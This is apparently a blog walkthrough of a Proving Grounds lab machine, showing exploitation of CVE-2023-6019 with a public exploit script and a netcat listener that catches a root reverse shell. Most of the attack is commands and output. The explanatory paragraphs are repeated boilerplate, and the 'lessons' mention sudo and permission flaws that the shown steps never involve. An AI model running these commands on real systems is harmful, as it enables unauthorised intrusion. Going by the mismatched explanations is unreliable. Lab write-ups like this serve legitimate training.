Post

Proving Grounds - CVE-2023-6019 (Linux)

Proving Grounds CVE-2023-6019 Linux walkthrough covering reconnaissance, initial access, and privilege escalation.

Posted Updated
By Paul
3 min read
Proving Grounds - CVE-2023-6019 (Linux)

Overview

Field Value
OS Linux
Difficulty Not specified
Attack Surface Web application and exposed network services
Primary Entry Vector Web RCE (CVE-2023-6019)
Privilege Escalation Path Local enumeration -> misconfiguration abuse -> root

Credentials

No credentials obtained.

Reconnaissance

💡 Why this works
This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.

Initial Foothold

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1

python3 /tools/git-dumper/git_dumper.py http://192.168.205.37:44217/.git/ /home/n0z0/work/04.OSCP/Proving_Ground/CVE-2023-6019

1
2
3
4
5
6
7

✅[3:01][CPU:5][MEM:79][TUN0:192.168.45.244][...ving_Ground/CVE-2023-6019]
🐉 > python3 /tools/git-dumper/git_dumper.py http://192.168.205.37:44217/.git/ /home/n0z0/work/04.OSCP/Proving_Ground/CVE-2023-6019
/tools/git-dumper/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
Warning: Destination '/home/n0z0/work/04.OSCP/Proving_Ground/CVE-2023-6019' is not empty
[-] Testing http://192.168.205.37:44217/.git/HEAD [200]
error: http://192.168.205.37:44217/.git/HEAD is not a git HEAD file

💡 Why this works
The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.

Privilege Escalation

Screenshot from the cve-2023-6019 engagement Caption: Screenshot captured during this stage of the assessment.

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1

git clone https://github.com/Clydeston/CVE-2023-6019.git

1
2
3
4
5
6
7
8
9

❌[3:37][CPU:1][MEM:76][TUN0:192.168.45.244][...ving_Ground/CVE-2023-6019]
🐉 > git clone https://github.com/Clydeston/CVE-2023-6019.git
Cloning into 'CVE-2023-6019'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1

python3 CVE-2023-6019.py -t 192.168.205.37 -p 9000 -l 192.168.45.244 -lp 80

1
2
3
4

✅[4:22][CPU:51][MEM:75][TUN0:192.168.45.244][...E-2023-6019/CVE-2023-6019]
🐉 > python3 CVE-2023-6019.py -t 192.168.205.37 -p 9000 -l 192.168.45.244 -lp 80
Sending Payload

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

1
2
3
4

rlwrap -cAri nc -lvnp 80
ls
ls -la
cat proof.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

❌[4:22][CPU:58][MEM:71][TUN0:192.168.45.244][/home/n0z0]
🐉 > rlwrap -cAri nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.244] from (UNKNOWN) [192.168.205.37] 41146
root@ubuntu:/opt# ls
ls
server-ml.py
root@ubuntu:/opt# ls -la
ls -la
total 12
drwxr-xr-x  2 root root 4096 Dec 16  2023 .
drwxr-xr-x 19 root root 4096 Jun 15  2022 ..
-rw-r--r--  1 root root 1324 Dec 16  2023 server-ml.py

root@ubuntu:~# cat proof.txt
cat proof.txt
bfe6ff4e77c09176e9a93c2086a4a12a
root@ubuntu:~#

riba-su 💡 Why this works
Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.

Lessons Learned / Key Takeaways

  • Validate framework debug mode and error exposure in production-like environments.
  • Restrict file permissions on scripts and binaries executed by privileged users or schedulers.
  • Harden sudo policies to avoid wildcard command expansion and scriptable privileged tools.
  • Treat exposed credentials and environment files as critical secrets.

References

  • CVE-2023-6019: https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • RustScan: https://github.com/RustScan/RustScan
  • Nmap: https://nmap.org/
  • feroxbuster: https://github.com/epi052/feroxbuster
  • Nuclei: https://github.com/projectdiscovery/nuclei
  • GTFOBins: https://gtfobins.org/
  • HackTricks Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
Proving Grounds, Linux
rce suid php privilege-escalation
This post is licensed under CC BY 4.0 by the author.